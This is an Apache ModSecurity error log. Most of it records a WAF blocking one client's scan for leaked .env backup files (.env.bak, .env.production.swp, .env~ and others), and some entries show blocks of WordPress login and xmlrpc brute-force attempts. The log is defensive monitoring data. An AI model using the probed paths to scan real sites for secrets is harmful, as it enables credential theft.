[Tue May 26 14:29:23.650179 2026] [security2:error] [pid 610693:tid 610860] [client 208.84.100.165:38340] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpcalendars.anujoverseas.in"] [uri "/___proxy_subdomain_cpcalendars/.env.production.copy"] [unique_id "ahVg6zvNO3hpmlY6M8RrMAAAACU"]
[Tue May 26 14:29:23.746329 2026] [proxy:error] [pid 610693:tid 610916] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:23.746395 2026] [proxy_http:error] [pid 610693:tid 610916] [client 208.84.100.165:38372] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:23.747022 2026] [proxy:error] [pid 610693:tid 610916] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:23.747055 2026] [proxy_http:error] [pid 610693:tid 610916] [client 208.84.100.165:38372] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:23.747249 2026] [proxy:error] [pid 610693:tid 610886] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:23.747300 2026] [proxy_http:error] [pid 610693:tid 610886] [client 208.84.100.165:38388] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:23.747908 2026] [proxy:error] [pid 610693:tid 610886] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:23.747940 2026] [proxy_http:error] [pid 610693:tid 610886] [client 208.84.100.165:38388] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:24.273343 2026] [security2:error] [pid 606909:tid 607133] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVg610yRtX9qA7aVUVwPQAAAOM"]
[Tue May 26 14:29:24.542294 2026] [security2:error] [pid 606909:tid 606938] [remote 167.71.130.119:58072] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.130.71.167.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "avprealty.com"] [uri "/wp-login.php"] [unique_id "ahVg7F0yRtX9qA7aVUVwSAAAkxw"]
[Tue May 26 14:29:24.840333 2026] [security2:error] [pid 610693:tid 610919] [client 1.20.206.162:60727] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "anujtradingco.com"] [uri "/wp-comments-post.php"] [unique_id "ahVg7DvNO3hpmlY6M8RrRgAAAGA"]
[Tue May 26 14:29:25.050762 2026] [security2:error] [pid 610693:tid 610919] [client 1.20.206.162:60727] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-comments-post.php"] [unique_id "ahVg7DvNO3hpmlY6M8RrRgAAAGA"]
[Tue May 26 14:29:25.050814 2026] [security2:error] [pid 610693:tid 610919] [client 1.20.206.162:60727] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-comments-post.php"] [unique_id "ahVg7DvNO3hpmlY6M8RrRgAAAGA"]
[Tue May 26 14:29:25.250134 2026] [security2:error] [pid 610693:tid 610894] [client 208.84.100.165:22268] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpcalendars.anujoverseas.in"] [uri "/___proxy_subdomain_cpcalendars/.env.production.backup"] [unique_id "ahVg7TvNO3hpmlY6M8RrUQAAAEc"]
[Tue May 26 14:29:25.257865 2026] [proxy:error] [pid 610693:tid 610825] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:25.257916 2026] [proxy_http:error] [pid 610693:tid 610825] [client 208.84.100.165:38340] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:25.259769 2026] [proxy:error] [pid 610693:tid 610825] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:25.259827 2026] [proxy_http:error] [pid 610693:tid 610825] [client 208.84.100.165:38340] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:25.260719 2026] [proxy:error] [pid 606909:tid 607079] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:25.260763 2026] [proxy_http:error] [pid 606909:tid 607079] [client 208.84.100.165:22272] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:25.261156 2026] [security2:error] [pid 606909:tid 607145] [client 208.84.100.165:22182] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpcalendars.anujoverseas.in"] [uri "/___proxy_subdomain_cpcalendars/.env.local.old"] [unique_id "ahVg7V0yRtX9qA7aVUVwUgAAAO8"]
[Tue May 26 14:29:25.261796 2026] [proxy:error] [pid 606909:tid 607079] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:25.261820 2026] [security2:error] [pid 606909:tid 607157] [client 208.84.100.165:22136] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpcalendars.anujoverseas.in"] [uri "/___proxy_subdomain_cpcalendars/.env~"] [unique_id "ahVg7V0yRtX9qA7aVUVwUwAAAPs"]
[Tue May 26 14:29:25.261830 2026] [proxy_http:error] [pid 606909:tid 607079] [client 208.84.100.165:22272] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:25.261841 2026] [security2:error] [pid 610693:tid 610906] [client 208.84.100.165:22158] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpcalendars.anujoverseas.in"] [uri "/___proxy_subdomain_cpcalendars/.env.copy"] [unique_id "ahVg7TvNO3hpmlY6M8RrUwAAAFM"]
[Tue May 26 14:29:25.262035 2026] [security2:error] [pid 610693:tid 610910] [client 208.84.100.165:22152] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpcalendars.anujoverseas.in"] [uri "/___proxy_subdomain_cpcalendars/.env.swp"] [unique_id "ahVg7TvNO3hpmlY6M8RrVQAAAFc"]
[Tue May 26 14:29:25.262181 2026] [security2:error] [pid 610693:tid 610858] [client 208.84.100.165:22114] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpcalendars.anujoverseas.in"] [uri "/___proxy_subdomain_cpcalendars/.env.backup"] [unique_id "ahVg7TvNO3hpmlY6M8RrVwAAACM"]
[Tue May 26 14:29:25.262418 2026] [proxy:error] [pid 606909:tid 607074] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:25.262469 2026] [proxy_http:error] [pid 606909:tid 607074] [client 208.84.100.165:22090] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:25.262718 2026] [proxy:error] [pid 610693:tid 610843] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:25.262761 2026] [proxy_http:error] [pid 610693:tid 610843] [client 208.84.100.165:22126] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:25.262868 2026] [security2:error] [pid 610693:tid 610839] [client 208.84.100.165:22170] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpcalendars.anujoverseas.in"] [uri "/___proxy_subdomain_cpcalendars/.env.local.bak"] [unique_id "ahVg7TvNO3hpmlY6M8RrVAAAABA"]
[Tue May 26 14:29:25.263137 2026] [security2:error] [pid 610693:tid 610847] [client 208.84.100.165:22102] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpcalendars.anujoverseas.in"] [uri "/___proxy_subdomain_cpcalendars/.env.old"] [unique_id "ahVg7TvNO3hpmlY6M8RrWAAAABg"]
[Tue May 26 14:29:25.263281 2026] [security2:error] [pid 610693:tid 610943] [client 208.84.100.165:22092] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpcalendars.anujoverseas.in"] [uri "/___proxy_subdomain_cpcalendars/.env.bak"] [unique_id "ahVg7TvNO3hpmlY6M8RrWgAAAHg"]
[Tue May 26 14:29:25.263316 2026] [proxy:error] [pid 610693:tid 610843] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:25.263350 2026] [proxy_http:error] [pid 610693:tid 610843] [client 208.84.100.165:22126] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:25.263492 2026] [proxy:error] [pid 606909:tid 607074] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:25.263551 2026] [proxy:error] [pid 610693:tid 610926] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:25.263547 2026] [proxy_http:error] [pid 606909:tid 607074] [client 208.84.100.165:22090] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:25.263592 2026] [proxy_http:error] [pid 610693:tid 610926] [client 208.84.100.165:22086] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:25.264223 2026] [proxy:error] [pid 610693:tid 610926] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:25.264262 2026] [proxy_http:error] [pid 610693:tid 610926] [client 208.84.100.165:22086] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:25.265272 2026] [proxy:error] [pid 606909:tid 607144] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:25.265315 2026] [proxy_http:error] [pid 606909:tid 607144] [client 208.84.100.165:22058] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:25.265928 2026] [proxy:error] [pid 606909:tid 607144] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:25.265963 2026] [proxy_http:error] [pid 606909:tid 607144] [client 208.84.100.165:22058] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:25.270124 2026] [security2:error] [pid 606909:tid 607112] [client 208.84.100.165:22298] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpcalendars.anujoverseas.in"] [uri "/___proxy_subdomain_cpcalendars/.env.production.swp"] [unique_id "ahVg7V0yRtX9qA7aVUVwVgAAAM4"]
[Tue May 26 14:29:25.270598 2026] [security2:error] [pid 610693:tid 610832] [client 208.84.100.165:22288] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpcalendars.anujoverseas.in"] [uri "/___proxy_subdomain_cpcalendars/.env.production~"] [unique_id "ahVg7TvNO3hpmlY6M8RrXAAAAAk"]
[Tue May 26 14:29:25.270599 2026] [security2:error] [pid 610693:tid 610934] [client 208.84.100.165:22312] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpcalendars.anujoverseas.in"] [uri "/___proxy_subdomain_cpcalendars/.env.production.orig"] [unique_id "ahVg7TvNO3hpmlY6M8RrWwAAAG8"]
[Tue May 26 14:29:25.447310 2026] [security2:error] [pid 606909:tid 607040] [client 208.84.100.165:22262] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpcalendars.anujoverseas.in"] [uri "/___proxy_subdomain_cpcalendars/.env.production.old"] [unique_id "ahVg7V0yRtX9qA7aVUVwVwAAAIY"]
[Tue May 26 14:29:25.447407 2026] [security2:error] [pid 606909:tid 607147] [client 208.84.100.165:22214] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpcalendars.anujoverseas.in"] [uri "/___proxy_subdomain_cpcalendars/.env.local~"] [unique_id "ahVg7V0yRtX9qA7aVUVwWQAAAPE"]
[Tue May 26 14:29:25.447418 2026] [security2:error] [pid 610693:tid 610924] [client 208.84.100.165:22246] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpcalendars.anujoverseas.in"] [uri "/___proxy_subdomain_cpcalendars/.env.production.bak"] [unique_id "ahVg7TvNO3hpmlY6M8RrXgAAAGU"]
[Tue May 26 14:29:25.447426 2026] [security2:error] [pid 610693:tid 610893] [client 208.84.100.165:22222] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpcalendars.anujoverseas.in"] [uri "/___proxy_subdomain_cpcalendars/.env.local.swp"] [unique_id "ahVg7TvNO3hpmlY6M8RrYAAAAEY"]
[Tue May 26 14:29:25.447729 2026] [security2:error] [pid 610693:tid 610925] [client 208.84.100.165:22234] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpcalendars.anujoverseas.in"] [uri "/___proxy_subdomain_cpcalendars/.env.local.orig"] [unique_id "ahVg7TvNO3hpmlY6M8RrXQAAAGY"]
[Tue May 26 14:29:25.447881 2026] [proxy:error] [pid 610693:tid 610882] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:25.447932 2026] [proxy_http:error] [pid 610693:tid 610882] [client 208.84.100.165:22202] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:25.448077 2026] [security2:error] [pid 610693:tid 610949] [client 208.84.100.165:22314] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpcalendars.anujoverseas.in"] [uri "/___proxy_subdomain_cpcalendars/.env.orig"] [unique_id "ahVg7TvNO3hpmlY6M8RrYQAAAH4"]
[Tue May 26 14:29:25.448299 2026] [security2:error] [pid 606909:tid 607044] [client 208.84.100.165:22190] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpcalendars.anujoverseas.in"] [uri "/___proxy_subdomain_cpcalendars/.env.local.backup"] [unique_id "ahVg7V0yRtX9qA7aVUVwWgAAAIo"]
[Tue May 26 14:29:25.448373 2026] [security2:error] [pid 606909:tid 607159] [client 208.84.100.165:22238] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpcalendars.anujoverseas.in"] [uri "/___proxy_subdomain_cpcalendars/.env.local.copy"] [unique_id "ahVg7V0yRtX9qA7aVUVwWAAAAP0"]
[Tue May 26 14:29:25.448488 2026] [proxy:error] [pid 610693:tid 610882] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:25.448519 2026] [proxy_http:error] [pid 610693:tid 610882] [client 208.84.100.165:22202] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:26.355537 2026] [security2:error] [pid 610693:tid 610823] [client 1.20.206.162:33456] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "anujtradingco.com"] [uri "/wp-comments-post.php"] [unique_id "ahVg7jvNO3hpmlY6M8RrcwAAAAA"]
[Tue May 26 14:29:26.363154 2026] [proxy:error] [pid 606909:tid 607110] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:26.363232 2026] [proxy_http:error] [pid 606909:tid 607110] [client 208.84.100.165:22298] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:26.363916 2026] [proxy:error] [pid 606909:tid 607110] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:26.363959 2026] [proxy_http:error] [pid 606909:tid 607110] [client 208.84.100.165:22298] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:26.402654 2026] [security2:error] [pid 610693:tid 610823] [client 1.20.206.162:33456] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "anujtradingco.com"] [uri "/wp-comments-post.php"] [unique_id "ahVg7jvNO3hpmlY6M8RrcwAAAAA"]
[Tue May 26 14:29:26.936042 2026] [security2:error] [pid 610693:tid 610948] [client 202.141.83.254:19834] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVg7jvNO3hpmlY6M8RrgAAAAH0"]
[Tue May 26 14:29:26.936193 2026] [security2:error] [pid 610693:tid 610948] [client 202.141.83.254:19834] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVg7jvNO3hpmlY6M8RrgAAAAH0"]
[Tue May 26 14:29:27.988667 2026] [security2:error] [pid 610693:tid 610893] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVg7zvNO3hpmlY6M8RrjgAAAEY"]
[Tue May 26 14:29:28.452376 2026] [security2:error] [pid 606909:tid 607111] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVg8F0yRtX9qA7aVUVwcQAAAM0"]
[Tue May 26 14:29:28.624321 2026] [security2:error] [pid 610693:tid 610832] [client 1.20.206.162:34200] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "anujtradingco.com"] [uri "/wp-comments-post.php"] [unique_id "ahVg8DvNO3hpmlY6M8RroQAAAAk"]
[Tue May 26 14:29:28.666181 2026] [security2:error] [pid 610693:tid 610832] [client 1.20.206.162:34200] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "anujtradingco.com"] [uri "/wp-comments-post.php"] [unique_id "ahVg8DvNO3hpmlY6M8RroQAAAAk"]
[Tue May 26 14:29:30.124845 2026] [security2:error] [pid 610693:tid 610827] [client 1.20.206.162:35322] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "anujtradingco.com"] [uri "/wp-comments-post.php"] [unique_id "ahVg8jvNO3hpmlY6M8RrxAAAAAQ"]
[Tue May 26 14:29:30.169591 2026] [security2:error] [pid 610693:tid 610827] [client 1.20.206.162:35322] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "anujtradingco.com"] [uri "/wp-comments-post.php"] [unique_id "ahVg8jvNO3hpmlY6M8RrxAAAAAQ"]
[Tue May 26 14:29:30.639009 2026] [security2:error] [pid 610693:tid 610894] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVg8jvNO3hpmlY6M8RrygAAAEc"]
[Tue May 26 14:29:31.617230 2026] [security2:error] [pid 606909:tid 607124] [client 1.20.206.162:36133] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "anujtradingco.com"] [uri "/wp-comments-post.php"] [unique_id "ahVg810yRtX9qA7aVUVwigAAANo"]
[Tue May 26 14:29:31.657254 2026] [security2:error] [pid 606909:tid 607124] [client 1.20.206.162:36133] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "anujtradingco.com"] [uri "/wp-comments-post.php"] [unique_id "ahVg810yRtX9qA7aVUVwigAAANo"]
[Tue May 26 14:29:32.156765 2026] [security2:error] [pid 610693:tid 610830] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVg8zvNO3hpmlY6M8Rr6wAAAAc"]
[Tue May 26 14:29:33.124863 2026] [security2:error] [pid 610693:tid 610876] [client 1.20.206.162:36878] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "anujtradingco.com"] [uri "/wp-comments-post.php"] [unique_id "ahVg9TvNO3hpmlY6M8Rr_wAAADU"]
